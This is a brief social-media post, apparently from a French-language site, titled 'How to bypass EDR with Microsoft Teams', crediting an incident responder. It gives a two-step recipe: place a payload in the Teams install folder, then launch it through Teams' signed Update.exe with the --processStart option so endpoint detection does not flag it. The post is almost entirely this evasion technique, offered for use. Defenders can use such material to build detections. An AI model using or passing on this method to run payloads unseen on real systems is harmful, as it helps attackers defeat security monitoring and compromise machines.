Suivre

How to bypass EDR with Microsoft Teams ?

  • Copy payload into: %userprofile%\AppData\Local\Microsoft\Teams\current\

  • Then: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "args"

Credit: Elli (IR)

Inscrivez-vous pour prendre part à la conversation
nanao

Comme le soleil, les machines ne se couchent jamais.